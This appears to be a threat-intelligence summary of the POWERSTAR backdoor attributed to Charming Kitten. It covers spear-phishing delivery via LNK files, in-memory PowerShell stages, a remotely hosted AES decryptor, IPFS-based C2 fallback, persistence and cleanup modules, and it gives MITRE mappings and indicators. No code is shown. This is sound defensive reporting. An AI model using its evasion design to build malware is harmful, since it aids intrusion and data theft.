Keypoints
- Charming Kitten distributed an updated POWERSTAR via spear-phishing that used a password-protected RAR containing a malicious LNK to start the chain.
- The LNK downloads an initial PowerShell script from a Backblaze B2 bucket and executes additional encrypted PowerShell stages in memory using Invoke-Expression.
- POWERSTAR separates its AES decryption routine from the initial payload by hosting the decryptor and config remotely; without that remote file the payload crashes, limiting analysis and enabling a kill-switch.
- The backdoor supports multiple C2 channels (attacker servers, cloud hosts, and IPFS) and can retrieve updated C2 addresses from IPFS CIDs via a list of IPFS gateways.
- Built-in modules provide reconnaissance (systeminfo, process listing), file crawling, persistence (Registry Run keys, startup tasks), remote code execution (PowerShell and C#), and an expanded Cleanup module that removes artifacts and stops processes.
- POWERSTAR communicates initial system info and a hardcoded victim identifier to a C2 (example: fuschia-rhinestone.cleverapps[.]io) and can receive multiple commands per response with a defined command-field structure.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Delivered a password-protected RAR containing a malicious LNK that initiates the infection chain. (‘password-protected RAR file containing a malicious LNK file’)
- [T1059.001] PowerShell – Stages executed PowerShell in memory via obfuscated Invoke-Expression calls to decode, download, and run subsequent scripts. (‘executed in memory via an obfuscated call to the Invoke-Expression alias, gcm i*x’)
- [T1105] Ingress Tool Transfer – The LNK and initial script download additional POWERSTAR components and modules from Backblaze and attacker-controlled infrastructure. (‘downloads POWERSTAR from Backblaze and attacker-controlled infrastructure’)
- [T1102] Web Service – Malware uses cloud hosting and public services (OneDrive, S3, Backblaze, Clever Cloud) and IPFS as channels for hosting payloads and configs. (‘use of the InterPlanetary File System (IPFS), as well as remotely hosting its decryption function and configuration details on publicly accessible cloud hosting’)
- [T1547.001] Registry Run Keys / Startup Folder – Persistence established via Registry Run keys and Startup tasks to execute dropped payloads on reboot. (‘Persistence via Startup tasks, Registry Run keys’)
- [T1082] System Information Discovery – Initial payload collects system information and sends it with a victim identifier to the C2 via POST. (‘collects a small amount of system information from the compromised machine and sends it via a POST request to the C2’)
- [T1057] Process Discovery – A module enumerates running processes using tasklist and stores results for exfiltration. (‘Enumerates running processes via “tasklist”’)
- [T1083] File and Directory Discovery – File Crawler module recursively traverses drives to find files matching specific extensions and reports metadata to C2. (‘recursively traverse all directories to search for files matching specific extensions’)
- [T1070.004] Indicator Removal on Host: File Deletion – Cleanup module deletes persistence registry keys, stops processes, and removes files and logs to hinder forensic analysis. (‘Deletes all the persistence-related registry keys and corresponding files’)
Indicators of Compromise
- [Domain / C2] C2 subdomain observed – fuschia-rhinestone.cleverapps[.]io (Clever Cloud instance)
- [File names] Remote stage and config files – cettj34c.txt, k24510.txt (downloaded from Backblaze B2 and decoded by initial PowerShell)
- [File paths] Local artifacts and identifiers – %APPDATA%MicrosoftWindowsnpv.txt (victim identifier), %appdata%MicrosoftNotepadProcesses.txt (process listing)
- [Cloud / Hosting] Hosting platforms used for delivery – Backblaze B2 URL(s) for initial loader, AWS S3/OneDrive/Dropbox historically, and IPFS CIDs for dynamic C2 (and other cloud-hosted files)
The infection begins with a targeted spear-phish that builds rapport with the target before sending a password-protected RAR containing a malicious LNK. When the LNK is executed, it downloads an initial PowerShell loader from a Backblaze B2 bucket and runs it in memory via an obfuscated Invoke-Expression call; that loader contains encrypted blobs and logic to decode a second Backblaze URL, fetch the AES decryptor/config (e.g., k24510.txt), and use that remote AES routine to decrypt and execute the primary in-memory POWERSTAR payload.
Once active, POWERSTAR posts a small system profile and a hardcoded victim identifier to its C2 (observed: fuschia-rhinestone.cleverapps[.]io), accepts multi-field commands (language~Command~threadname~startstop separated by special delimiters), and supports PowerShell and C# execution. The framework dynamically updates AES keys via the C2, randomizes IVs (sent in the Content-DPR header), and downloads additional modules in memory (screenshot, processes, applications, file crawler, persistence monitor, cleanup, etc.). Persistence is established via Registry Run keys and startup scripts; a separate Persistence module drops an IPFS-oriented payload that reads a CID from a list of IPFS gateways to retrieve updated C2 addresses if needed.
Defensive evasion is emphasized: the decryption routine is hosted remotely and not written to disk (preventing static decryption), execution happens in-memory, and a multi-level Cleanup module can remove logs, stop processes, delete persistence artifacts, and remove files associated with later executable stages. The File Crawler enumerates drives and collects metadata on matched file extensions, while the Persistence Monitor reports the presence of registry keys and files back to the C2; IPFS is used as a resilient fallback for C2 distribution, preventing easy takedown of the remote config/CID by third-party hosts.